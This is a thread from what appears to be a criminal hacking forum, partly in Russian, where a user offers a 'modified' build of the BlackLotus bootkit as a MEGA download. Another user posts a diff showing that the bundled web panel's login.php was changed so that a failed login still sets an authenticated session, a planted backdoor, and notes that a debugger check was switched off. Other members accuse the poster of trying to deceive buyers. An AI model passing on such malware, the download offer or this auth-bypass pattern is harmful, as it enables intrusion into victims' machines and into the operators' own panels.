What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

BlackLotus modified version

Rat-Botnet

Midle Weight
Депозит
$0
This is a modified version of Black Lotus that fixes some bugs in the original GitHub repository
49.93 MB file on MEGA
mega.nz

Dread Pirate Roberts сказал(а):
бэкдор в веб панели, пускает без авторизации:
Код:
Скопировать в буфер обмена
diff -u -w -B -a -N -r orig/panel/login.php BlackLotus-main_116/panel/login.php
--- orig/panel/login.php 2023-07-13 03:42:00.000000000 +0100
+++ BlackLotus-main_116/panel/login.php 2023-11-02 19:36:22.122082800 +0100
@@ -28,7 +28,11 @@
exit();
}
else
- echo('<div class="error">Invalid username or password!</div>');
+ echo('<div class="error">Invalid 111username or password!</div>');
+ $_SESSION['auth'] = true;
+ $_SESSION['time'] = (string)microtime(true);
+ header('location: index.php');
+ exit();
}
?>
<form method="POST">

непонятно зачем отключена проверка на дебаггер

единственный возможно полезный фикс (судя по всему, для работы на китайских машинах):

Нажмите, чтобы раскрыть...

My friend made the modifications, but I haven’t looked at the specific source code. If there are any backdoors or other errors, please point them out. Thank you.

Rat-Botnet сказал(а):
My friend made the modifications, but I haven’t looked at the specific source code. If there are any backdoors or other errors, please point them out. Thank you.

I have shown all modifications made to the original leak: just 4 lines of code added (login.php) and 2 lines of code changed (nzt.c)
as far as I understand PHP the modification in login.php will accept any login and password, so it is a backdoor.

Rat-Botnet сказал(а):
My friend made the modifications, but I haven’t looked at the specific source code.

Перед тем как что то публиковать на форуме, сначала проверяйте это на наличие таких "сюрпризов", иначе это выглядит как попытка обмануть других пользователей.

Dread Pirate Roberts сказал(а):
I have shown all modifications made to the original leak: just 4 lines of code added (login.php) and 2 lines of code changed (nzt.c)
as far as I understand PHP the modification in login.php will accept any login and password, so it is a backdoor.

OK, thank you, I will communicate with my friends

coree сказал(а):
Перед тем как что то публиковать на форуме, сначала проверяйте это на наличие таких "сюрпризов", иначе это выглядит как попытка обмануть других пользователей.

I am not a professional programmer, I just want to share part of my software source code. If there are any problems or backdoors later, please tell me and I will delete them and ask for guidance from forum professionals.